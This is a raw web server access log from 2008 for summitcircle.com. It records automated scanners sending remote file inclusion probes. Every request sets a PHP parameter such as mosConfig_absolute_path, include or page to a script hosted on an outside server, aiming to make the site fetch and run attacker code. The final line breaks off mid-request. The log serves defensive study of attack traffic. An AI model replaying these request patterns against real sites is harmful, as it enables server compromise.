78.129.220.45 - - [30/Jun/2008:06:25:46 -0700] "GET //?mosConfig_absolute_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:25:46 -0700] "GET /logs//?mosConfig_absolute_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 200 10095 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:26:00 -0700] "GET /logs/access_080406.log/includes/footer.php?systempath=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
72.29.87.105 - - [30/Jun/2008:06:26:06 -0700] "GET /logs/access_071021.log/index.php?include=http://fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:26:26 -0700] "GET /logs/access_070924.log//?mosConfig_absolute_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:26:26 -0700] "GET /logs/access_070924.log//?mosConfig_absolute_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:26:54 -0700] "GET /logs/access_071231.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:26:54 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:26:54 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:26:56 -0700] "GET /index.php?page=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:06:29:02 -0700] "GET /logs/access.log/index.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:06:29:02 -0700] "GET /index.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:06:29:03 -0700] "GET /logs/index.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:29:11 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:29:11 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:29:12 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
61.222.167.228 - - [30/Jun/2008:06:29:23 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
61.222.167.228 - - [30/Jun/2008:06:29:26 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
207.58.164.77 - - [30/Jun/2008:06:29:43 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.58.164.77 - - [30/Jun/2008:06:29:43 -0700] "GET /modules/xfsection/modify.php?dir_module=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.58.164.77 - - [30/Jun/2008:06:29:43 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://francealacarte.net/templates/sida6_4.gif???????